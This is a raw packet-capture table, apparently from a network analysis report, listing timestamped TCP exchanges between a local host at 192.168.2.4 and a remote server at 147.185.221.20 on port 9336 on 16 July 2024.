Jul 16, 2024 21:07:11.523298979 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523312092 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523317099 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523338079 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523349047 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523350954 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523376942 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523377895 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523390055 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523396015 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523426056 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523436069 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523459911 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523474932 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523487091 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523499966 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523507118 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523518085 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523535013 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523541927 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523643017 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523657084 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523669958 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523682117 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523694992 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523699045 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523709059 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523715019 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523721933 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523726940 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523736000 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523749113 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523753881 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523761988 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523767948 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523775101 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523797035 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523802996 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523814917 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523816109 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523829937 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523838997 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523843050 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523855925 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523869038 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523884058 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523886919 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523901939 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523907900 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523915052 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523929119 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.523932934 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523947954 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.523983002 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526112080 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526125908 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526164055 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526185989 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526213884 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526227951 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526288986 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526303053 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526323080 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526330948 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526335955 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526345015 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526357889 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526366949 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526371956 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526381969 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526386023 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526395082 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526400089 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526413918 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526423931 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526427031 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526439905 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526441097 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526453972 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526468992 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526482105 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526494980 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526504993 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526506901 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526516914 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526520967 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526534081 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526546001 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526556969 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526563883 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526577950 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526598930 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526602983 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526617050 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526623964 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526629925 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526643038 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526655912 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526663065 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526668072 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526679993 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526691914 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526704073 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526705027 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526719093 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526719093 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526732922 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526737928 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526747942 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526748896 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526766062 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526773930 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526787996 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526789904 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526803017 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526809931 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526844025 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526859045 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526871920 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526884079 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526902914 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526907921 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526922941 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.526923895 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526954889 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.526978016 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527008057 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527023077 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527034998 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527048111 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527060032 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527067900 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527072906 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527080059 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527096987 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527110100 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527115107 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527122974 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527129889 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527137041 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527151108 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527152061 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527184963 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527201891 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527359962 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527489901 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527503967 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527515888 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527529001 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527549028 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527551889 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527565002 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527570963 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527589083 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527618885 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527715921 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527760029 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527770996 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527784109 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527822971 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527861118 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527884960 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.527940035 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.527978897 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528007030 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528021097 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528033972 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528033972 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528052092 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528063059 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528073072 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528074026 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528090000 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528109074 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528129101 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528158903 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528172970 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528197050 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528201103 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528212070 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528215885 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528229952 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528235912 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528248072 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528254032 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528266907 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528273106 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528286934 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528290033 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528297901 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528306007 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528311968 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528325081 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528332949 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528356075 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528414965 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528429031 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528441906 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528455019 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528464079 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528469086 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528475046 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528486967 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528492928 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528506994 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528516054 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528518915 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528533936 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528546095 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528559923 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528573036 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528582096 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528585911 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528599024 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528599977 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528613091 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528619051 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528625965 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528640032 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528647900 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528660059 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528666019 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528678894 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528681993 CEST  49737  9336   192.168.2.4     147.185.221.20
Jul 16, 2024 21:07:11.528695107 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528758049 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528774023 CEST  9336   49737  147.185.221.20  192.168.2.4
Jul 16, 2024 21:07:11.528786898 CEST  9336   49737  147.185.221.20  192.168.2.4
                                                                                Jul 16, 2024 21:07:11.528812885 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.528827906 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.528861046 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.528872967 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.528923988 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.528938055 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529011011 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529023886 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529036999 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529052973 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529144049 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529156923 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529170990 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529182911 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529195070 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529273033 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529288054 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529300928 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529313087 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529325962 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529350042 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529362917 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529398918 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529412031 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529501915 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529515028 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529526949 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529552937 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529566050 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529577971 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529591084 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529603958 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529616117 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529639006 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529652119 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529665947 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529690981 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529706955 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529756069 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529768944 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529792070 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529803991 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529829979 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529843092 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529858112 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529901981 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.529915094 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:11.576848030 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.523264885 CEST933649737147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.525955915 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.530879021 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.530947924 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.532079935 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.536801100 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.564131021 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.876873970 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.881901026 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.881916046 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.881925106 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.881936073 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.881943941 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.881973982 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.882036924 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.883737087 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.883747101 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.883750916 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.883754969 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.883764029 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.883780956 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.883816004 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.888113022 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.888122082 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.888132095 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.888206959 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.888220072 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.888272047 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.888340950 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.888408899 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.888771057 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.888808966 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.915970087 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.916186094 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.922442913 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.922626972 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.923026085 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923089027 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923089981 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.923121929 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923171997 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923177958 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.923199892 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923228979 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923229933 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.923249960 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.923259020 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923278093 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.923310041 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.923316002 CEST497389336192.168.2.4147.185.221.20
